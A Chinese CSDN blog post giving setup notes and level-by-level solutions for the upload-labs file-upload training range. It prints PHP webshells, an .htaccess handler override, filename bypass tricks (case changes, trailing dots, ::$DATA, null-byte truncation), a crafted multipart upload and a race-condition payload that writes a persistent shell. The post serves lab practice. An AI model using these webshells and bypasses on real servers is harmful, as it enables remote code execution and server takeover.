upload-labs靶场搭建+题目解答

已于 2023-08-04 15:08:25 修改
阅读量400 收藏
点赞数 1
分类专栏: 渗透 文章标签: 网络安全
于 2023-07-26 19:06:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131934329
版权

目录

upload-labs靶场搭建

upload-labs题目

php基础木马

 黑名单绕过(规定有些类型不通过)

Pass-01 

 Pass-02

 Pass-03

CtfHub-htaccess

  Pass-05

   Pass-06

   Pass-07

   Pass-08

   Pass-09

   Pass-10

   Pass-11

   Pass-20

白名单绕过(只允许规定的类型通过)

   Pass-12

   Pass-13

   Pass-14

   Pass-15

   Pass-16

   Pass-17

   Pass-21

条件竞争

   Pass-18

   Pass-19

upload-labs靶场搭建

 

upload-labs题目

php基础木马

<?php
eval($_REQUEST[a]);
?>
<?php
system($_REQUEST[a]);
?>

 黑名单绕过(规定有些类型不通过)

Pass-01 

上传jpg文件,抓包后修改后缀为php

 复制路径

 在浏览器地址后粘贴刚刚复制的内容输入?a=phpinfo();

 Pass-02

 上传php文件

 修改Content-Type为image/jpeg

  复制路径

  在浏览器地址后粘贴刚刚复制的内容输入?a=phpinfo();

 Pass-03

修改后缀为.php1 .php2 .php3 .php4 .phtml

条件利用苛刻需要开启SSI

apache配置文件httpd.conf中有如下配置

AddType application/x-httpd-php .php .phtml

CtfHub-htaccess

htaccess文件有用的条件

1、php5.6以下不带nts的版本  无该版本-无法复现

2、黑名单中未过滤 .htaccess

3、apache配置文件httpd.conf中启用了AllowOverride All

AllowOverride None

改为

AllowOverride ALL

4、服务端未处理文件名(否则上传到htaccess到目录下成为其它文件名则不奏效)

内容:

AddType application/x-httpd-php .jpg

后门:

<FilesMatch "conf"> 

SetHandler application/x-httpd-php 

</FilesMatch>

上传jpg文件 

上传文件 

 

进行抓包,修改后缀,修改内容

 内容修改为:AddType application/x-httpd-php .jpg

 查看文件上传成功

输入地址,复制

 将复制的地址粘贴到蚁剑

在html目录上找到flag

  Pass-05

. .逻辑绕过

后缀为.php. .

 上传php文件,修改后缀,在后面加上. .

 

 

   Pass-06

后缀大小写绕过

 上传php文件,修改后缀,改变大小写

   Pass-07

首尾未去空

123.php 最后加个空格

 

   Pass-08

尾部未删除点

.php. 即可

 

   Pass-09

windows文件流,没有删除::$DATA

在使用NTFS格式的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名

例如:"phpinfo.php::$DATA"Windows会自动去掉末尾的::$DATA变成"phpinfo.php"

.php::$DATA

 

 

   Pass-10

同5题

.php. .

 

   Pass-11

删除匹配的后缀,双写绕过

7.PphpHP

 

   Pass-20

move_uploaded_file()特性,忽略文件末尾的/.

123123.php/. 即可绕过

上传jpg文件 ,抓包后修改save_name的后缀

 

白名单绕过(只允许规定的类型通过)

   Pass-12

php5.5.9nts

GET型00截断

save_path=../upload/141.php%00.jpg

post里面放1.jpg

在get处输入 123.php%00.jpg

 可以查看到添加成功

 在后台查询到123.php的文件

   Pass-13

php5.5.9nts

POST型00截断

save_path=../upload/141.phpa.jpg a改成00

filename仍是.jpg

 在该处输入123.phpa.jpg,注意该处输入为a,方便寻找

发送到Repeater,在Hex处寻找61, 将刚刚a处的61,改为00,回车

可以查看到添加成功

  在后台查询到1232.php的文件

   Pass-14

图片马制作,需另外配合文件包含漏洞

copy 1.jpg/b + 123.php/a hack1.jpg

 

   Pass-15

getimagesize函数绕过,同14

   Pass-16

需要php开启exif_imagetype()函数

同14

   Pass-17

二次渲染,检查上传前后图片的内容并更改

环境有问题、可忽略不做

同14

   Pass-21

CTF题目,考点是explode分割数组


Content-Disposition: form-data; name="upload_file"; filename="a.jpg"

Content-Type: image/jpeg


<?php eval($_REQUEST[a]);?>

------WebKitFormBoundaryqyfBEj3alReo3OMK

Content-Disposition: form-data; name="save_name[0]"


upload-20.php

------WebKitFormBoundaryqyfBEj3alReo3OMK

Content-Disposition: form-data; name="save_name[2]"


jpg

------WebKitFormBoundaryqyfBEj3alReo3OMK

Content-Disposition: form-data; name="submit"


上传

------WebKitFormBoundaryqyfBEj3alReo3OMK--

 

条件竞争

   Pass-18

条件竞争,服务器会将上传的php文件删除。

同时进行上传爆破,和访问爆破即可。

<?php fputs(fopen("a.php", "w"), '<?php eval($_REQUEST[1]);?>'); ?>

上传php文件

 进行抓包,传到intruder,进行爆破

 将里面内容更改, 对随意的位置进行爆破

 

 设置线程数

 对upload/4.php进行抓包

 抓到的包发送去爆破

 对随意的位置进行爆破

 设置参数

 设置线程数

 最后查到后台拆创建了一个新文件为刚刚命令创建的文件a.php

   Pass-19

条件竞争,通过上传图片马配合其他漏洞来做

<?php fputs(fopen("a.php", "w"), '<?php eval($_REQUEST[1]);?>'); ?>

Serein_NSQ
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
安装upload-labs
10-22
在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的步骤 1. 下载靶场文件:首先,您需要下载upload-labs靶场文件,可以从官方网站或其他可靠的渠道下载。...
【网络安全】upload-labs+PHPStudy本地靶场搭建详细教程
等风来
08-14 8742
PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。在URL栏输入localhost/upload-labs-master或者输入127.0.0.1/upload-labs-master。自此,upload-labs靶场搭建成功。安装完成后打开PhpStudy。
文件上传漏洞靶场环境搭建测试
san3144393495的博客
05-13 337
前端一般指的是html,javascript等代码,它的代码过滤写在页面中,这个页面中不分前端后端,举个例子,前端在浏览器看到的源码和文件的源码是一模一样的,比如这个html,所以我们才能复制下来写个文件直接当源码用,而后端 : 例如php文件浏览器显示的源码和文件的源码是不一样的,如下图所示,这个,不建议burp去抓,有可能抓不到数据包,如果上传不成功就不会有数据包,上传成功了才会数据包,如果改一下代码,他也抓不到了,抓到的原因归根到底是代码的问题,他这里是有一个接受的php代码。打开搭建好的测试网站。
upload-labs靶场的安装搭建
最新发布
wangluoanquan111的博客
04-22 623
1、首先安装phpstudy的环境,下载进行安装2、然后到GitHub去下载upload-labs的源码!3、将下载的压缩包解压到phpstudy文件,phpstudy/www网站的根目录下。4、本地浏览器访问127.0.0.1/upload-labs/就可以访问靶场了!
使用docker进行upload-labs靶场的安装搭建
失心少年
07-03 2746
由于我是在kali上搭建,默认没有docker服务,这里就从按照docker开始讲解。
upload-labs 本地靶场搭建详细教程
m0_73909170的博客
01-29 2323
原文链接:https://blog.csdn.net/2301_77485708/article/details/132111064。phpStudy 官网:https://www.xp.cn/ 安装版的 因为后期配置的靶场包都是复制到安装版的路径下。upload-labs 靶机下载地址: https://github.com/c0ny1/upload-labs。文件上传漏洞 upload-labs 网络安全 Upload-Labs靶场攻防实战。自此,upload-labs靶场搭建成功。
一口气学完upload-labs 文件上传靶场
小小白勿喷
09-14 190
是专门针对文件上传的靶场。总共21关,现在搬起小板凳,让我们一起来学习吧!
upload-labs靶场通关指南
07-02
Upload-labs靶场通关指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场的通关指南,涵盖了从基础的文件上传漏洞到高级...
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞的靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Windows10搭建upload-labs靶场
weixin_45837672的博客
07-19 1661
Windows10搭建upload-labs靶场
upload-labs·文件上传(靶场攻略)
duoba_an的博客
03-19 4292
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
文件上传漏洞靶场搭建upload-labs
Bluetuan的博客
12-29 965
在初步了解文件上传漏洞靶场搭建时发现经常使用uploads-labs作为现成靶场文件,这样一来就会大大降低搭建难度,同时搭建平台比较多,可以利用Linux、Window Sever 2008 R2、Docker等进行搭建,我在这里选择了使用自己电脑的Win11直接进行搭建,并未使用虚拟机。1.下载靶场代码,这是一个为了免去大家环境搭建的烦恼、基于phpstudy这个php集成环境搭建的、直接安装就能使用的靶场代码。4.点击启动即可启动靶场,此时界面可能会提示端口冲突,关闭该端口对应的服务即可。
使用docker搭建upload-labs靶场
qq_53409748的博客
02-23 410
docker搭建upload-labs靶场
win10(虚拟机或者本机)安装apache和php_upload-labs靶场准备环境
qq_51550750的博客
04-09 2596
本篇主要是为了搭建upload-labs这个靶场准备的环境。 说明: 虽然 PHPStudy 之类的软件给我们提供了方便的集成环境,但是其使用的是非线程安全的 PHP 版本(Not Thread Safe, NTS),某些功能不可以使用。所以,我们还需要自己再安装一个 Apache+PHP 的环境。 下载Apache 官网链接: http://www.apachelounge.com/download/ 我们是 64 位操作系统,下载 win64 版本(主版本是 2.4 即可,后面的小版本无影响)。 我本
【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5关闯关思路及技巧,源码分析
m0_67844671的博客
10-29 929
【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5关闯关思路及技巧,源码分析
upload-labs文件上传靶场13-15 最详细最全
wrypot的博客
03-16 476
include.php文件包含只会将内容进行php解析,新手注意文件包含并不是include把文件包住,而是include.php?如果你没有这个界面那么记住这里有一个组合拳,就是利用前面的关卡上传一个include.php,13题是白名单,无法上传.php文件的。注意:先看有没有include.php,自己搭建靶场没有,fofa里面找到靶场是自带include.php的。通过前面的关卡上传include.php之后就可以利用文件包含漏洞去解析了,上传的include.php文件里面的内容是。
CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker)
zatongtong的博客
01-18 2015
基于 CentOS 7 系统,利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场靶场的初始化,Docker 基本使用
upload-labs靶场搭建教程
08-19
你可以按照以下步骤来搭建upload-labs靶场: 1. 首先,你可以使用以下命令将upload-labs镜像拉取到本地仓库: docker pull cuer/upload-labs [1] 2. 接下来,你可以在镜像仓库中搜索upload-labs镜像,使用以下命令:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值